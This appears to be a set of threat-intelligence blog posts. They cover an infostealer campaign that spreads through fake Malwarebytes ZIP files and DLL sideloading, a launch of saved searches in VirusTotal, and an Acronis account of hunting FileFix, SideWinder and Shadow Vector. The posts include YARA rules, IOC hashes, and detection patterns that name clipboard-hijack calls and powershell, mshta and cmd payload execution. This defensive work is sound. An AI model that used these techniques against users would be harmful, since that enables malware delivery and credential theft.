
New Infostealer Campaign Targets Users via Spoofed Software Installers

16 January 2026 at 12:35

Introduction

As part of our commitment to sharing interesting hunts, we are launching these 'Flash Hunting Findings' to highlight active threats. Our latest investigation tracks an operation active between January 11 and January 15, 2026, which uses consistent ZIP file structures and a unique behash ("4acaac53c8340a8c236c91e68244e6cb") for identification. The campaign relies on a trusted executable to trick the operating system into loading a malicious payload, leading to the execution of secondary-stage infostealers.

Findings

The primary samples identified are ZIP files that mostly reference the Malwarebytes company and software, using the filename malwarebytes-windows-github-io-X.X.X.zip. A notable feature for identification is that all of them share the same behash.
behash:"4acaac53c8340a8c236c91e68244e6cb"
The initial instance of these samples was identified on January 11, 2026, with the most recent occurrence recorded on January 14.
All of these ZIP archives share a nearly identical internal structure, containing the same set of files across the different versions identified. Of particular importance are the DLL file, which serves as the initial malicious payload, and a specific TXT file found in each archive. This text file has been observed on VirusTotal under two distinct filenames: gitconfig.com.txt and Agreement_About.txt.
The content of the TXT file holds no significant importance for the intrusion itself, as it merely contains a single string consisting of a GitHub URL.
However, this TXT is particularly valuable for pivoting and infrastructure mapping. By examining its "execution parents," analysts can identify additional ZIP archives that are likely linked to the same malicious campaign. These related files can be efficiently retrieved for further investigation using the following VirusTotal API v3 endpoint:
/api/v3/files/09a8b930c8b79e7c313e5e741e1d59c39ae91bc1f10cdefa68b47bf77519be57/execution_parents
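As a minimal sketch of that pivot in Python (standard library only): the host and the `x-apikey` header follow the public API v3 conventions, while the helper names `build_parents_request` and `parent_hashes` are illustrative assumptions, not part of any official client.

```python
import json
import urllib.request

VT_BASE = "https://www.virustotal.com"
# SHA-256 of the TXT file referenced in the endpoint above
TXT_SHA256 = "09a8b930c8b79e7c313e5e741e1d59c39ae91bc1f10cdefa68b47bf77519be57"


def build_parents_request(file_hash: str, api_key: str) -> urllib.request.Request:
    """Prepare (but do not send) the GET request for a file's execution parents."""
    url = f"{VT_BASE}/api/v3/files/{file_hash}/execution_parents"
    return urllib.request.Request(url, headers={"x-apikey": api_key})


def parent_hashes(response_body: str) -> list[str]:
    """Pull the object IDs out of an API v3 collection response body."""
    payload = json.loads(response_body)
    return [item["id"] for item in payload.get("data", [])]


# Sending the request is left to the caller, for example:
#   with urllib.request.urlopen(build_parents_request(TXT_SHA256, key)) as resp:
#       print(parent_hashes(resp.read().decode()))
```

Keeping request construction separate from the network call makes the pivot easy to dry-run before spending API quota.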
The primary payload of this campaign is contained within a malicious DLL named CoreMessaging.dll. Threat actors are utilizing a technique known as DLL Sideloading to execute this code. This involves placing the malicious DLL in the same directory as a legitimate, trusted executable (EXE) also found within the distributed ZIP file. When an analyst or user runs the legitimate EXE, the operating system is tricked into loading the malicious CoreMessaging.dll.
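The co-location that sideloading depends on can be checked before anything is executed. The following is a rough triage sketch, assuming the archive is available as bytes; `sideload_candidates` is a hypothetical helper name, and a hit only means the layout matches, not that the DLL is malicious.

```python
import io
import posixpath
import zipfile

SIDELOADED_DLL = "coremessaging.dll"  # DLL name reported for this campaign


def sideload_candidates(zip_bytes: bytes) -> list[str]:
    """Return archive directories that hold both an EXE and CoreMessaging.dll."""
    exe_dirs, dll_dirs = set(), set()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for name in archive.namelist():
            folder, filename = posixpath.split(name)
            lowered = filename.lower()
            if lowered.endswith(".exe"):
                exe_dirs.add(folder)
            elif lowered == SIDELOADED_DLL:
                dll_dirs.add(folder)
    # Sideloading needs both files side by side, so intersect the two sets
    return sorted(exe_dirs & dll_dirs)
```

Only the archive's file listing is read, so the check is safe to run on untrusted samples.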
The identified DLLs exhibit distinctive metadata characteristics that are highly effective for pivoting and uncovering additional variants within the same campaign. Security analysts can utilize specific hunting queries to track down other malicious DLLs belonging to this activity. For instance, analysts can search for samples sharing the following unique signature strings found in the file metadata:
signature:"Peastaking plenipotence ductileness chilopodous codicillary."
signature:"© 2026 Eosinophil LLC"
Furthermore, the exported functions within these DLLs contain unusual alphanumeric strings. These exports serve as reliable indicators for identifying related malicious components across different stages of the campaign:
exports:15Mmm95ml1RbfjH1VUyelYFCf exports:2dlSKEtPzvo1mHDN4FYgv
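The signature and export pivots above can be combined into a single search. The sketch below assumes that the search syntax accepts `OR` with parentheses and that the query is sent to the API v3 intelligence search endpoint; the helpers `any_of` and `search_url` are hypothetical names introduced for illustration.

```python
from urllib.parse import urlencode

# Assumed endpoint for programmatic searches (requires an appropriate API key)
SEARCH_ENDPOINT = "https://www.virustotal.com/api/v3/intelligence/search"


def any_of(modifier: str, values: list[str], quote: bool = False) -> str:
    """Join several values for one search modifier into an OR group."""
    terms = [f'{modifier}:"{v}"' if quote else f"{modifier}:{v}" for v in values]
    return "(" + " OR ".join(terms) + ")"


def search_url(query: str) -> str:
    """URL-encode a query for the search endpoint (nothing is sent here)."""
    return SEARCH_ENDPOINT + "?" + urlencode({"query": query})


signatures = any_of(
    "signature",
    ["Peastaking plenipotence ductileness chilopodous codicillary.",
     "© 2026 Eosinophil LLC"],
    quote=True,
)
exports = any_of("exports", ["15Mmm95ml1RbfjH1VUyelYFCf", "2dlSKEtPzvo1mHDN4FYgv"])
dll_query = f"{signatures} OR {exports}"
```

Using `OR` between the groups casts the widest net; switching to `AND` would restrict results to samples carrying both kinds of marker.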
Finally, another observation for behavioral analysis can be found in the relations tab of the ZIP files. These files document the full infection chain observed during sandbox execution, where the sandbox extracts the ZIP, runs the legitimate EXE, and subsequently triggers the loading of the malicious DLL. Within the Payload Files section, additional payloads are visible. These represent secondary stages dropped during the initial DLL execution, which act as the final malware samples. These final payloads are primarily identified as infostealers, designed to exfiltrate sensitive data.
Analysis of the ZIP files' behavioral relations reveals a recurring payload file consistently flagged as an infostealer. This malicious component is identified by various YARA rules, including those specifically designed to detect signatures associated with stealing cryptocurrency wallet browser extension IDs, among others.
To identify and pivot through the various secondary-stage payloads dropped during this campaign, analysts can utilize a specific behash identifier. These files represent the final infection stage and are primarily designed to exfiltrate credentials and crypto-wallet information. The following behash provides a reliable pivot point for uncovering additional variants.
behash:5ddb604194329c1f182d7ba74f6f5946

IOCs

We have created a public VirusTotal Collection to share all the IOCs freely and easily. Below you can find a YARA rule for the malicious DLLs, followed by the main IOCs related to the ZIP files, DLLs, and dropped payloads.
import "pe"

rule win_dll_sideload_eosinophil_infostealer_jan26
{
  meta:
    author = "VirusTotal"
    description = "Detects malicious DLLs (CoreMessaging.dll) from an infostealer campaign impersonating Malwarebytes, Logitech, and others via DLL sideloading."
    reference = "https://blog.virustotal.com/2026/01/malicious-infostealer-january-26.html"
    date = "2026-01-16"
    behash = "4acaac53c8340a8c236c91e68244e6cb"
    target_entity = "file"
    hash = "606baa263e87d32a64a9b191fc7e96ca066708b2f003bde35391908d3311a463"
  condition:
    (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and pe.is_dll()) and
    pe.exports("15Mmm95ml1RbfjH1VUyelYFCf") and pe.exports("2dlSKEtPzvo1mHDN4FYgv")
}
sha256 description
6773af31bd7891852c3d8170085dd4bf2d68ea24a165e4b604d777bd083caeaa malwarebytes-windows-github-io-X.X.X.zip
4294d6e8f1a63b88c473fce71b665bbc713e3ee88d95f286e058f1a37d4162be malwarebytes-windows-github-io-X.X.X.zip
5591156d120934f19f2bb92d9f9b1b32cb022134befef9b63c2191460be36899 malwarebytes-windows-github-io-X.X.X.zip
42d53bf0ed5880616aa995cad357d27e102fb66b2fca89b17f92709b38706706 malwarebytes-windows-github-io-X.X.X.zip
5aa6f4a57fb86759bbcc9fc6c61b5f74c0ca74604a22084f9e0310840aa73664 malwarebytes-windows-github-io-X.X.X.zip
84021dcfad522a75bf00a07e6b5cb4e17063bd715a877ed01ba5d1631cd3ad71 malwarebytes-windows-github-io-X.X.X.zip
ca8467ae9527ed908e9478c3f0891c52c0266577ca59e4c80a029c256c1d4fce malwarebytes-windows-github-io-X.X.X.zip
9619331ef9ff6b2d40e77a67ec86fc81b050eeb96c4b5f735eb9472c54da6735 malwarebytes-windows-github-io-X.X.X.zip
a2842c7cfaadfba90b29e0b9873a592dd5dbea0ef78883d240baf3ee2d5670c5 malwarebytes-windows-github-io-X.X.X.zip
4705fd47bf0617b60baef8401c47d21afb3796666092ce40fbb7fe51782ae280 malwarebytes-windows-github-io-X.X.X.zip
580d37fc9d9cc95dc615d41fa2272f8e86c9b4da2988a336a8b3a3f90f4363c2 malwarebytes-windows-github-io-X.X.X.zip
d47fd17d1d82ea61d850ccc2af3bee54adce6975d762fb4dee8f4006692c5ef7 malwarebytes-windows-github-io-X.X.X.zip
606baa263e87d32a64a9b191fc7e96ca066708b2f003bde35391908d3311a463 CoreMessaging.dll DLL loaded by DLL SideLoading
fd855aa20467708d004d4aab5203dd5ecdf4db2b3cb2ed7e83c27368368f02bb CoreMessaging.dll DLL loaded by DLL SideLoading
a0687834ce9cb8a40b2bb30b18322298aff74147771896787609afad9016f4ea CoreMessaging.dll DLL loaded by DLL SideLoading
4235732440506e626fd4d0fffad85700a8fcf3e83ba5c5bc8e19ada508a6498e CoreMessaging.dll DLL loaded by DLL SideLoading
cd1fe2762acf3fb0784b17e23e1751ca9e81a6c0518c6be4729e2bc369040ca5 CoreMessaging.dll DLL loaded by DLL SideLoading
f798c24a688d7858efd6efeaa8641822ad269feeb3a74962c2f7c523cf8563ff CoreMessaging.dll DLL loaded by DLL SideLoading
0698a2c6401059a3979d931b84d2d4b011d38566f20558ee7950a8bf475a6959 CoreMessaging.dll DLL loaded by DLL SideLoading
1b3bee041f2fffcb9c216522afa67791d4c658f257705e0feccc7573489ec06f CoreMessaging.dll DLL loaded by DLL SideLoading
231c05f4db4027c131259d1acf940e87e15261bb8cb443c7521294512154379b CoreMessaging.dll DLL loaded by DLL SideLoading
ec2e30d8e5cacecdf26c713e3ee3a45ebc512059a64ba4062b20ca8bec2eb9e7 CoreMessaging.dll DLL loaded by DLL SideLoading
58bd2e6932270921028ab54e5ff4b0dbd1bf67424d4a5d83883c429cadeef662 CoreMessaging.dll DLL loaded by DLL SideLoading
57ed35e6d2f2d0c9bbc3f17ce2c94946cc857809f4ab5c53d7cb04a4e48c8b14 CoreMessaging.dll DLL loaded by DLL SideLoading
cfcf3d248100228905ad1e8c5849bf44757dd490a0b323a10938449946eabeee CoreMessaging.dll DLL loaded by DLL SideLoading
f02be238d14f8e248ad9516a896da7f49933adc7b36db7f52a7e12d1c2ddc6af CoreMessaging.dll DLL loaded by DLL SideLoading
f60802c7bec15da6d84d03aad3457e76c5760e4556db7c2212f08e3301dc0d92 CoreMessaging.dll DLL loaded by DLL SideLoading
02dc9217f870790b96e1069acd381ae58c2335b15af32310f38198b5ee10b158 CoreMessaging.dll DLL loaded by DLL SideLoading
f9549e382faf0033b12298b4fd7cd10e86c680fe93f7af99291b75fd3d0c9842 CoreMessaging.dll DLL loaded by DLL SideLoading
92f4d95938789a69e0343b98240109934c0502f73d8b6c04e8ee856f606015c8 CoreMessaging.dll DLL loaded by DLL SideLoading
66fba00b3496d61ca43ec3eae02527eb5222892186c8223b9802060a932a5a7a CoreMessaging.dll DLL loaded by DLL SideLoading
e5dd464a2c90a8c965db655906d0dc84a9ac84701a13267d3d0c89a3c97e1e9b CoreMessaging.dll DLL loaded by DLL SideLoading
35211074b59417dd5a205618fed3402d4ac9ca419374ff2d7349e70a3a462a15 CoreMessaging.dll DLL loaded by DLL SideLoading
6863b4906e0bd4961369b8784b968b443f745869dbe19c6d97e2287837849385 CoreMessaging.dll DLL loaded by DLL SideLoading
a83c478f075a3623da5684c52993293d38ecaa17f4a1ddca10f95335865ef1e2 CoreMessaging.dll DLL loaded by DLL SideLoading
43e2936e4a97d9bc43b423841b137fde1dd5b2f291abf20d3ba57b8f198d9fab CoreMessaging.dll DLL loaded by DLL SideLoading
f001ae3318ba29a3b663d72b5375d10da5207163c6b2746cfae9e46a37d975cf CoreMessaging.dll DLL loaded by DLL SideLoading
c67403d3b6e7750222f20fa97daa3c05a9a8cce39db16455e196cd81d087b54d CoreMessaging.dll DLL loaded by DLL SideLoading
5ee9d4636b01fd3a35bd8e3dce86a8c114d8b0aa6b68b1d26ace7ef0f85b438a Payload dropped by one of the malicious DLLs
e84b0dadb0b6be9b00a063ed82c8ddba06a2bd13f07d510d14e6fd73cd613fba Payload dropped by one of the malicious DLLs
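
For readers who want to load the list above into their own tooling, here is a small parsing sketch. It assumes each row is a 64-character lowercase SHA-256 followed by a free-text description, as in the listing; `parse_iocs` and `count_by_description` are hypothetical helper names.

```python
import re
from collections import Counter

# One IOC row: 64 hex characters, whitespace, then the description
IOC_LINE = re.compile(r"^([0-9a-f]{64})\s+(.+)$")


def parse_iocs(text: str) -> list[tuple[str, str]]:
    """Turn 'sha256 description' rows into (hash, description) tuples."""
    rows = []
    for line in text.splitlines():
        match = IOC_LINE.match(line.strip())
        if match:  # header and blank lines do not match and are skipped
            rows.append((match.group(1), match.group(2)))
    return rows


def count_by_description(rows: list[tuple[str, str]]) -> Counter:
    """Count how many hashes fall under each description."""
    return Counter(description for _, description in rows)
```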

Introducing Saved Searches in Google Threat Intelligence (GTI) and VirusTotal (VT): Enhance Collaboration and Efficiency

10 December 2025 at 11:24

We are excited to announce the launch of Saved Searches in Google Threat Intelligence (GTI) and VirusTotal (VT), a powerful new feature designed to streamline your threat hunting workflows and foster seamless collaboration across your security team.

From Campaign to Feature: Better Search Efficiency

For the last month, we’ve highlighted the critical importance of mastering search in our ongoing #monthofgoogletisearch campaign. We saw how security teams rely on complex, highly-tuned queries to identify threats, track adversaries, and perform deep-dive investigations.

This campaign emphasized a key challenge: once you craft the perfect query - a cornerstone of your investigation - it should be easy to reuse and share. Saved Searches is the direct answer to this need, turning successful, repeatable threat-hunting logic into a shared institutional asset.

Collaboration, Simplified: Save and Share Your Queries

With this initial launch of Saved Searches, we’re delivering two foundational capabilities that will immediately improve your team’s efficiency:

  1. Save Searches: Instantly save any complex or frequently used query directly within GTI. This ensures your best investigative logic is always accessible, eliminating the need to rebuild queries from scratch or store them externally.
  2. Share with Users: Critical insights are often time-sensitive. You can now easily share your saved searches with any other user in your organization with access to GTI. Whether you’re escalating a finding or establishing a standard workflow, sharing the exact query ensures consistency and accelerates joint analysis.
This means that a newly onboarded analyst can instantly access the expertise of senior members, and teams can maintain a unified approach to monitoring high-priority threats. It’s collaboration built right into your investigation tool.

Get Started Today with Campaign Searches

The Saved Searches feature is live now in Google Threat Intelligence and VirusTotal.

To help you hit the ground running, we have made the most impactful searches used throughout the #monthofgoogletisearch campaign public and available to all intelligence users! You can find these expert-crafted queries in your Saved Searches section today - a perfect starting point for your investigations.



Start by exploring these campaign searches and then easily save and share your own complex search queries. Look for the option to Save and Share your searches to transform your investigative logic into a shared asset.



This is just the first phase of enhancing search capabilities within GTI. We are committed to building on this foundation to provide even more robust tools that make your threat intelligence actionable and collaborative.

You can get more info by exploring our documentation page:

Thank you for your feedback during the #monthofgoogletisearch campaign - your input directly fueled this launch.

Happy Hunting! ^_^

VTPRACTITIONERS{ACRONIS}: Tracking FileFix, Shadow Vector, and SideWinder

10 November 2025 at 12:56

Introduction

We have recently started a new blog series called #VTPRACTITIONERS. This series aims to share with the community what other practitioners are able to research using VirusTotal from a technical point of view.
Our first blog saw our colleagues at SEQRITE tracking UNG0002, Silent Lynx, and DragonClone. In this new post, Acronis Threat Research Unit (TRU) shares practical insights from multiple investigations, including the ClickFix variant known as FileFix, the long-running South Asian threat actor SideWinder, and the SVG-based campaign targeting Colombia and named Shadow Vector.

How VT plays a role in hunting for analysts

For the threat analyst, web-based threats present a unique set of challenges. Unlike file-based malware, the initial stages of a web-based attack often exist only as ephemeral artifacts within a browser. The core of the investigation relies on dissecting the components of a website, from its HTML and JavaScript to the payloads it delivers. This is where VT's capabilities for archiving and analyzing web content become critical.
VT allows analysts to move beyond simple URL reputation checks and delve into the content of web pages themselves. For attacks like the *Fix family, which trick users into executing malicious commands, the entire attack chain is often laid bare within the page's source code. The analyst's starting point becomes the malicious commands themselves, such as navigator.clipboard.writeText or document.execCommand("copy"), which are used to surreptitiously copy payloads to the victim's clipboard.
The Acronis team's investigation into the FileFix variant demonstrates a practical application of this methodology. Their research began not with a specific sample, but with a hypothesis that could be translated into a set of hunting rules. Using VT's Livehunt feature, they were able to create YARA rules that searched for new web pages containing the clipboard commands alongside common payload execution tools like powershell, mshta, or cmd. This proactive hunting approach allowed them to cast a wide net and identify potentially malicious sites in real-time.
One of the main challenges in this type of hunting is striking a balance between rule specificity and the need to uncover novel threats. Overly broad rules can lead to a deluge of false positives, while highly specific rules risk missing creatively crafted commands. The Acronis team addressed this by creating multiple rulesets with varying levels of specificity, allowing them to both find known threats and uncover new variants like FileFix.
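The trade-off between broad and specific rulesets can be illustrated offline with a short Python sketch. This is not the Acronis ruleset: the proximity window, the tier names, and the function `triage_page` are assumptions made purely for illustration.

```python
import re

# Clipboard-write calls named in the text above
CLIPBOARD = re.compile(r'navigator\.clipboard\.writeText|document\.execCommand\("copy"\)')
# Execution tools named in the text above
PAYLOAD = re.compile(r"powershell|mshta|cmd", re.IGNORECASE)
WINDOW = 300  # hypothetical proximity threshold, in characters


def triage_page(html: str):
    """Return 'strict', 'broad', or None for a page's source code."""
    clip = [m.start() for m in CLIPBOARD.finditer(html)]
    pay = [m.start() for m in PAYLOAD.finditer(html)]
    if not clip or not pay:
        return None  # one of the two ingredients is missing
    # Strict tier: a payload keyword sits close to a clipboard call
    near = any(abs(c - p) <= WINDOW for c in clip for p in pay)
    return "strict" if near else "broad"
```

The broad tier surfaces anything with both ingredients, at the cost of more noise (a bare `cmd` matches many benign pages), while the strict tier trades recall for fewer false positives.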
In the case of the SideWinder campaign, which uses document-based attacks, VT's value comes from its rich metadata and filtering capabilities. Analysts can hunt for malicious documents exploiting specific vulnerabilities, and then narrow the results by focusing on specific geographic regions through submitter country information. This allows them to effectively isolate threats that match a specific actor's profile, such as SideWinder's focus on South Asia.
Similarly, for the Shadow Vector campaign, which used malicious SVG files to target users in Colombia, VT's content search and archiving proved essential. The platform's ability to store and index SVG content allowed researchers to identify a campaign using judicial-themed lures. By combining content searches for legal keywords with filters like submitter:CO, the Acronis team could map the entire infection chain and its infrastructure, transforming fragmented indicators into a comprehensive intelligence picture.

Acronis - Success Story

[In the words of Acronis…]
Acronis Threat Research Unit (TRU) used VirusTotal’s platform for threat hunting and intelligence across several investigations, including FileFix, SideWinder, and Shadow Vector. In the FileFix case, TRU used VT’s Livehunt framework, developing rules to identify malicious web pages using clipboard manipulation to deliver PowerShell payloads. The ability to inspect archived HTML and JavaScript within the VirusTotal platform allowed the team to uncover not only known Fix-family attacks but also previously unseen variants that shared code patterns.
VirusTotal’s data corpus also supported Acronis TRU’s broader threat tracking. In the SideWinder campaign, VT’s metadata and sample filtering capabilities helped analysts trace targeted document-based attacks exploiting tag:CVE-2017-0199 and tag:CVE-2017-11882 across South Asia, leading to the creation of hunting rules later published in “From banks to battalions: SideWinder’s attacks on South Asia’s public sector”.
Similarly, during the “Shadow Vector targets Colombian users via privilege escalation and court-themed SVG decoys” investigation, VT’s archive of SVG content exposed a campaign targeting Colombian entities that embedded judicial lures and external payload links within SVG images. By correlating samples with metadata filters such as submitter:CO and targeted content searches for terms like href="https://" and legal keywords, the team mapped an entire infection chain and its supporting infrastructure. Across all these efforts, VirusTotal provided a unified environment where Acronis could pivot, correlate, and validate findings in real time, transforming fragmented indicators into comprehensive, actionable intelligence.

Hunting Exploits Like It’s 2017-0199 (SideWinder Edition)

SideWinder is a well-known threat actor that keeps going back to what works. Their document-based delivery chain has been active for years, and the group continues to rely on the same proven exploits to target government and defense entities across South Asia. Our goal in this hunt was to get beyond just finding samples. We wanted to understand where new documents were surfacing, who they were likely aimed at, and what types of decoys were in circulation during the latest campaign wave. VirusTotal gave us the visibility we needed to do that efficiently and at scale.
We started by digging into Microsoft Office and RTF files recently uploaded to VirusTotal that were tagged with CVE-2017-0199 or CVE-2017-11882 and coming from Pakistan, Bangladesh, Sri Lanka, and neighboring countries. By filtering based on VT metadata such as submitter country and file type, and by excluding obvious noise from bulk submissions or unrelated activity, we could narrow our focus to the samples that actually fit SideWinder’s operational profile.
/*
    Checks if the file is tagged with CVE-2017-0199 or CVE-2017-11882
    and originates from one of the targeted countries
    and the file type is a Word document, RTF, or MS-Office file
*/
import "vt"
rule hunting_cve_maldocs {
    meta:
        author = "Acronis Threat Research Unit (TRU)"
        description = "Hunting for malicious Word/RTF files exploiting CVE-2017-0199 or CVE-2017-11882 from specific countries"
        distribution = "TLP:CLEAR"
        version = "1.2"

    condition:
        // Match if the file has CVE-2017-0199 or CVE-2017-11882 in the tags
        for any tag in vt.metadata.tags : 
        ( 
            tag == "cve-2017-0199" or 
            tag == "cve-2017-11882" 
        )
        // Originates from a specific country?
        and 
        (
            // Removed CN due to spam submissions of related maldocs
            vt.metadata.submitter.country == "PK" or 
            vt.metadata.submitter.country == "LK" or 
            vt.metadata.submitter.country == "BD" or 
            vt.metadata.submitter.country == "NP" or 
            vt.metadata.submitter.country == "MM" or 
            vt.metadata.submitter.country == "MV" or 
            vt.metadata.submitter.country == "AF"
        )
        // Is it a DOC, DOCX, or RTF?
        and 
        (
            vt.metadata.file_type == vt.FileType.DOC or
            vt.metadata.file_type == vt.FileType.DOCX or
            vt.metadata.file_type == vt.FileType.RTF
        )
        // Different TA spotted using .ru TLD (excluding it for now)
        and not (
            for any url in vt.behaviour.memory_pattern_urls : (
                url contains ".ru"
            )
        )
        and vt.metadata.new_file
} 
Next, we began translating those results into new livehunt rules. The initial version was intentionally broad: match any new document exploiting those CVEs, uploaded from a small list of countries of interest, and restricted to document file types like DOC, DOCX, or RTF. We also added logic to avoid hits that didn’t fit SideWinder’s patterns, such as samples calling out .ru infrastructure tied to other known threat clusters.
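To make the rule's filtering logic easier to reason about, the same conditions can be mirrored in Python and applied to exported sample metadata. This is a sketch under assumptions: the dictionary keys (`tags`, `submitter_country`, `file_type`, `memory_pattern_urls`, `new_file`) are hypothetical field names chosen for this example, not a VirusTotal export format.

```python
CVE_TAGS = {"cve-2017-0199", "cve-2017-11882"}
COUNTRIES = {"PK", "LK", "BD", "NP", "MM", "MV", "AF"}  # CN left out, as in the rule
DOC_TYPES = {"doc", "docx", "rtf"}


def fits_profile(sample: dict) -> bool:
    """Mirror the broad hunting rule's condition on one metadata record."""
    tags = {t.lower() for t in sample.get("tags", [])}
    urls = sample.get("memory_pattern_urls", [])
    return (
        bool(tags & CVE_TAGS)                              # tagged with either CVE
        and sample.get("submitter_country") in COUNTRIES   # region of interest
        and sample.get("file_type") in DOC_TYPES           # document formats only
        and not any(".ru" in u for u in urls)              # skip the other cluster
        and bool(sample.get("new_file"))                   # first-seen files only
    )
```

Like the rule, the `.ru` check is a plain substring match, so it would also exclude URLs that merely contain that sequence (for example a `.run` domain), which is worth keeping in mind when tuning.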
A good starting point when creating broad hunting rules is to define a daily notification limit. If everything works as expected and the level of false positives is tolerable, begin refining the rule as more hits arrive in your inbox.
It’s always a good idea to not spam your own inbox when creating broad hunting rules
In our case, the final hunting rule ended up matching a hexadecimal pattern for malicious documents used by SideWinder. By adding filters for submitter country and only triggering on new files, the rule produced a reliable feed of samples that we could confidently attribute to this actor for further analysis.
/*
    Sidewinder related malicious documents exploiting CVE 2017-0199 used during 2025 campaign
*/
import "vt"
rule apt_sidewinder_documents
{
    meta:

        author = "Acronis Threat Research Unit (TRU)"
        description = "Sidewinder related malicious documents exploiting CVE 2017-0199"
        distribution = "TLP:CLEAR"
        version = "1.0"

    strings:

        $a1 = {62544CB1F0B9E6E04433698E85BFB534278B9BDC5F06589C011E9CB80C71DF23}
        $a2 = {E20F76CDABDFAB004A6BA632F20CE00512BA5AD2FE8FB6ED9EE1865DFD07504B0304140000}

    condition:

        filesize  
Once we refined the rule set, SideWinder activity became much easier to track consistently. We began to see new decoys appear in near real time, allowing us to monitor changes in themes and spot repeated use of lure content and infrastructure across different campaigns. Using the same logic in retrohunt confirmed our observations that SideWinder had been using the same tactics for months, only changing the decoy topics while keeping the underlying delivery technique intact.
Using Retrohunt to uncover additional samples and establish the threat actor’s timeline
We also observed geofencing behavior in the delivery chain. If the server hosting the external resource did not recognize the visitor or the IP range did not match the intended target, the server often returned a benign decoy file (or an HTTP 404 error code) instead of the real payload.
While relying on exploits from 2017, SideWinder carefully filters the victims that will receive the final malicious payload
One recurring decoy had the SHA256 hash 1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a, which corresponds to an empty RTF document. That decoy is useful as a hunting pivot: by searching for that hash and combining it with submitter country and file type filters in VT, you can separate likely targeted, genuine hits from broad noise and map where geofencing is being applied.
RTF empty decoy file used by SideWinder still presents valuable information for pivoting into other parts of their infrastructure
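The triage implied by this geofencing behavior can be sketched as a small classifier over already-captured responses. The labels and the function `classify_response` are illustrative assumptions; only the decoy hash comes from the text above.

```python
import hashlib

# Recurring empty-RTF decoy mentioned above
DECOY_SHA256 = "1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a"


def classify_response(status: int, body: bytes,
                      decoy_hashes=frozenset({DECOY_SHA256})) -> str:
    """Label a captured server response as geofenced or worth a closer look."""
    if status == 404:
        return "not-served"      # server declined to deliver anything
    if hashlib.sha256(body).hexdigest() in decoy_hashes:
        return "decoy"           # known benign decoy returned instead of payload
    return "needs-review"        # anything else may be the real payload
```

Passing the decoy set as a parameter lets analysts extend it as further decoys are identified.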
In addition, VirusTotal allowed us to trace the attack back to the initial infection vector and recover some of the spear phishing emails that started the chain. We pivoted from known samples and shared strings, and used file relations to follow linked URLs and artifacts upstream, and found an .eml file that contained the original message and attachment. One concrete example is the spear phish titled 54th CISM World Military Naval Pentathlon 2025 - Invitation.eml, indexed in VirusTotal with behavior metadata and attachments tied to the same infrastructure.
Getting initial infection spear-phishing e-mails allowed us to put together the different pieces of the puzzle, from beginning to end
For other hunters, the key takeaway is that even older exploits like CVE-2017-0199 can reveal a lot when you combine multiple VirusTotal features. In this case, we used metadata, livehunt, and regional telemetry to connect seemingly unrelated samples. We also checked hashtags and community votes, including those from researchers like Joseliyo, to cross-check our assumptions and spot ongoing discussions about similar activity. The Telemetry tab helped us see where submissions were coming from geographically, and the Threat Graph view made it easier to visualize how documents, infrastructure, and payloads were linked.
Every single data point counts when hunting for new samples
Using these tools together turned a noisy set of samples into a clear picture of SideWinder’s targeting and operations.

Uncovering Shadow Vector’s SVG-Based Crimeware Campaign in Colombia

During our research, we identified a campaign we refer to as Shadow Vector, which used malicious SVG images crafted as court summonses and legal notifications to target users in Colombia.
An example of a rendered SVG lure with a judicial correspondence theme
These files mimicked official judicial correspondence and contained embedded links to externally hosted payloads, such as script-based downloaders or password-protected archives. The investigation began after we noticed an unusual pattern of SVG submissions from Colombia. By using a small set of samples for an initial rule, we began our hunt.
/*
    This YARA rule detects potentially malicious SVG files that are likely being used for crimeware campaigns targeting Colombia.
    The rule identifies SVG images that contain legal or judicial terms commonly used in phishing scams, 
    along with embedded external links that could be used to deliver a payload.
*/
import "vt"
rule crimeware_svg_colombia {
   meta:
        author = "Acronis Threat Research Unit (TRU)"
        description = "Detects potentially malicious SVG files that are likely being used for crimeware campaigns targeting Colombia"
        distribution = "TLP:CLEAR"
        version = "1.1"

        // Reference hashes
        hash1 = "6d4a53da259c3c8c0903b1345efcf2fa0d50bc10c3c010a34f86263de466f5a1"
        hash2 = "2aae8e206dd068135b16ff87dfbb816053fc247a222aad0d34c9227e6ecf7b5b"
        hash3 = "4cfeab122e0a748c8600ccd14a186292f27a93b5ba74c58dfee838fe28765061"
        hash4 = "9bbbcb6eae33314b84f5e367f90e57f487d6abe72d6067adcb66eba896d7ce33"
        hash5 = "60e87c0fe7c3904935bb1604bdb0b0fc0f2919db64f72666b77405c2c1e46067"
        hash6 = "609edc93e075223c5dc8caaf076bf4e28f81c5c6e4db0eb6f502dda91500aab4"
        hash7 = "4795d3a3e776baf485d284a9edcf1beef29da42cad8e8261a83e86d35b25cafe"
        hash8 = "5673ad3287bcc0c8746ab6cab6b5e1b60160f07c7b16c018efa56bffd44b37aa"
        hash9 = "b3e8ab81d0a559a373c3fe2ae7c3c99718503411cc13b17cffd1eee2544a787b"
        hash10 = "b5311cadc0bbd2f47549f7fc0895848adb20cc016387cebcd1c29d784779240c"
        hash11 = "c3319a8863d5e2dc525dfe6669c5b720fc42c96a8dce3bd7f6a0072569933303"
        hash12 = "cb035f440f728395cc4237e1ac52114641dc25619705b605713ecefb6fd9e563"
        hash13 = "cf23f7b98abddf1b36552b55f874ae1e2199768d7cefb0188af9ee0d9a698107"
        hash14 = "f3208ae62655435186e560378db58e133a68aa6107948e2a8ec30682983aa503"

   strings:
        // SVG 
        $svg = "<svg xmlns=" ascii fullword

        // Documents containing legal or judicial terms
        $s1 = "COPIA" nocase
        $s2 = "CITACION" nocase
        $s3 = "JUZGADO" nocase
        $s4 = "PENAL" nocase
        $s5 = "JUDICIAL" nocase
        $s6 = "BOGOTA" nocase
        $s7 = "DEMANDA" nocase

        // When image loads it retrieves payload from external website using HTTPS
        $href1= "href='https://" nocase
        $href2 = "href=\"https://" nocase

   condition:
      $svg 
      and filesize < 3MB
      and 3 of ($s*)
      and any of ($href*)
      and vt.metadata.submitter.country == "CO"
}
By including reference hashes from manually verified samples, we used a broad hunting rule both as a detection mechanism and as a pivot point for uncovering related infrastructure or newly generated lures.
Once the initial hunting logic was in place, we refined it into a livehunt rule specifically tailored for SVG-based decoys. The rule matched files containing judicial terminology and outbound HTTPS links, while filtering by file size and origin to reduce false positives. Using this rule, we began collecting and analyzing related uploads.
We used the VT Diff functionality to compare variations between samples and quickly spot patterns, such as repeated words, hexadecimal values, URLs, or metadata tags that hinted at automated generation (e.g., the string “Generado Automaticamente”).
VT Diff feature helped us to identify patterns
